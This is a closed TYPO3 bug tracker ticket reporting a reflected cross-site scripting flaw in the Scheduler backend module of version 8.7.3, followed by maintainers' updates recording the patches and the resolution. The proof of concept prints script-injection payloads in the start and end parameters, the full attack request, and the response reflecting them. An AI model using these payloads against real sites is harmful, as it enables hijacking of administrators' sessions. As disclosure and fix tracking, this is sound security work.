Bug #82079
closedXSS in scheduler
100%
Description
I would like to inform you about security issue that I have found on the plugin SCHEDULER of the cms TYPO3 (checked on version 8.7.3), specifically it is accessible in the "Scheduler" section of the Backend administrative console.
The plugin Scheduler of TYPO3 is resulted vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".
Technical Details
=================
Below is descripted the scenario to reproduce the security issue.
Proof of Concept:
To replicate the issue an authenticated user (with permission to create/edit tasks) have to click the button "Add-Task" or "Edit-Task" in the Scheduler area.
And so is sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated on the response.
EXAMPLE
Payloads:
krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1
de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag
ORIGINAL REQUEST:
----------------------------------
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save
PoC REQUEST:
-----------------------
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
PoC RESPONSE:
--------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div>
<div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div>
<div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div>
[...]
Attached a screenshot of the PoC to better illustrate the vulnerability.
Vulnerable Versions:
TYPO3 8.7.3 and earlier
Checked on TYPO3/8.7.3
I have not received your response for the other 2 previous reporting (I hope to receive at least a response from you). Anyway I am always available if you need further explanations, kind regards.
Updated by Gerrit Code Review over 7 years ago
- Status changed from New to Under Review
Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53699
Updated by Helmut Hummel over 7 years ago
Since Scheduler is an admin only module, we can publicly fix this issue.
Updated by Helmut Hummel over 7 years ago
- Project changed from 1716 to TYPO3 Core
- Category deleted (
OW-A07: Cross Site Scripting)
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53720
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736
Updated by Gerrit Code Review over 7 years ago
Patch set 2 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53737
Updated by Wouter Wolters over 7 years ago
- Status changed from Under Review to Resolved
- % Done changed from 0 to 100
Applied in changeset bb60d69724a5211569f116a859df82042c1e90fa.